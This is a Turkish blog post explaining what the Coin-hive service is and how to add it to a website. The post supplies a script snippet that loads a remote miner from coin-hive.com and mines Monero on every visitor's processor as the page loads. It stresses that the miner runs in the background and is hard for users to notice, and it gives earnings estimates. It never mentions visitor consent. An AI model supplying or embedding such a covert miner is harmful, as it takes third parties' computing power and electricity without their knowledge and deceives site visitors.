Coin-hive Nedir, Nasıl Çalışır ve Nasıl Kullanılır?

  • 0 paylaşım
  • 364 OKUNMA

Coin-hive web sitenizi veya mobil uygulamalarınızı ziyaret eden kullanıcıların cihazlarının işlemci gücünü kullanarak mining (kripto para madenciliği) yapan bir girişim. Tamamen arka planda çalışan ve kullanıcılar tarafından farkedilmesi oldukça zor olan bu sistemle özellikle uzun sitede kalma süresine sahip siteler (film-dizi siteleri vs.) çok iyi ücretler kazanabilirler. Coin-hive kurulumu ve kullanımı da oldukça basit.

Coin-hive Nasıl Çalışır

Coin-hive ziyaretçilerinizin işlemci gücünü kullanarak “Monero” adı verilen kripto paranın madenciliğini yapmanızı sağlar. Şu an 1 Monero’nun yaklaşık fiyatı 100$ civarında, yani 350 TL. Ortalama oturumu 5dk üzerinde olan ve günde 25-30k ziyaretçi alan bir site 0,5 ile 1 Monero arası kazanabilir. Tabi bu ziyaretçilerinizin oturum süresine ve işlemci gücüne de bağlı.

Coin-hive Nasıl Kurulur

Coin-hive adresine giderek basit bir şekilde üyelik oluşturun.
Daha sonra https://coin-hive.com/settings/sites adresinden site adresinizi ekleyin.
Size özel “site key” ve “secret key” oluşturulacaktır.
Aşağıdaki kod kısmında yer alan “site key” kısmına kendi site keyinizi yerleştirip sitenizin kaynak kodlarında </head> üstüne yerleştirin. Önbellek kullanıyorsanız temizleyin. Coin-hive ile Monero kazımı otomatik olarak başlayacaktır.

 

<script src=”https://coin-hive.com/lib/coinhive.min.js”></script><script src=”https://coin-hive.com/lib/coinhive.min.js”></script><script> var miner = new CoinHive.Anonymous(‘8fqha723ffoWxuFrQ5dBlQtEWbYwZDlY’); miner.start();</script>

Monero Cüzdan

Coin-hive ile kazdığınız Monero’ları kendi cihazınıza yükleyeceğiniz wallet’a (cüzdan) çekebilirsiniz. Bunun için bu adresten Monero wallet indirmelisiniz.

Beğendiniz mi? Oylayın:
Yorumlar

Henüz hiç yorum yapılmamış.